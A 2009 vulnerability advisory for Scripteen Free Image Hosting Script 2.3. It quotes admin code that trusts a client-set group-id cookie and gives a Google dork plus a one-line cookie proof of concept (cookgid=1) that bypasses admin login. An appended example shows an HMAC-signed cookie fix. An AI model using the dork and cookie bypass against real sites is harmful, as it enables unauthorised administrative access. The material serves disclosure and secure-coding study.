# Title : Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
# Published : 2009-07-24
# Author : Qabandi
By Qabandi
From Kuwait, PEACE...
iqa[a]hotmail.fr
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in ".adminheader.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
// no session: user id and group id are taken straight from client-supplied cookies
if (!$userid || empty($userid) || $userid==""){
    $userid = $_COOKIE['cookid'];
    $usergid = $_COOKIE['cookgid'];
}
// this is the script's authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
    header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
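One way to close the hole shown under Vulnerable_Code, as an added example (not code from this advisory or from Scripteen): admin status comes only from the server-side session or from an HMAC-verified remember-me value, never from a raw cookgid cookie. The cookie name "remember", the constant REMEMBER_KEY and the helper function names are assumptions.

```php
<?php
// Added example: hardened replacement for the check in ".adminheader.php".
// REMEMBER_KEY, the "remember" cookie and all function names are assumptions.
declare(strict_types=1);

const REMEMBER_KEY = 'PLACEHOLDER-load-a-random-32-byte-secret-from-outside-the-webroot';

// Build a tamper-evident remember-me value: "userid|usergid|expiry|mac".
// Send it with setcookie('remember', $v, ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']).
function make_remember_cookie(int $userid, int $usergid, int $ttl = 1209600): string
{
    $payload = $userid . '|' . $usergid . '|' . (time() + $ttl);
    return $payload . '|' . hash_hmac('sha256', $payload, REMEMBER_KEY);
}

// Return [userid, usergid] only if the MAC verifies and the value has not expired.
function parse_remember_cookie(string $cookie): ?array
{
    $parts = explode('|', $cookie);
    if (count($parts) !== 4) {
        return null;
    }
    [$uid, $gid, $exp, $mac] = $parts;
    $expected = hash_hmac('sha256', "$uid|$gid|$exp", REMEMBER_KEY);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    if (!ctype_digit($uid) || !ctype_digit($gid) || !ctype_digit($exp) || (int)$exp < time()) {
        return null;
    }
    return [(int)$uid, (int)$gid];
}

// Decide admin status from server-side state; raw cookid/cookgid cookies are never read.
function is_admin(array $session, array $cookies): bool
{
    $gid = $session['usergid'] ?? null;
    if ($gid === null && isset($cookies['remember']) && is_string($cookies['remember'])) {
        $identity = parse_remember_cookie($cookies['remember']);
        $gid = $identity[1] ?? null;
    }
    return (string)$gid === '1';
}

session_start();
if (!is_admin($_SESSION, $_COOKIE)) {
    header('Location: logout.php');
    exit;
}
```

A stateless signed cookie cannot be revoked individually and its group id can go stale; looking the group up in the user table by the verified user id on each request avoids both.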
No More Private
Salamz to All Muslim Hackers.
# www.Syue.com [2009-07-24]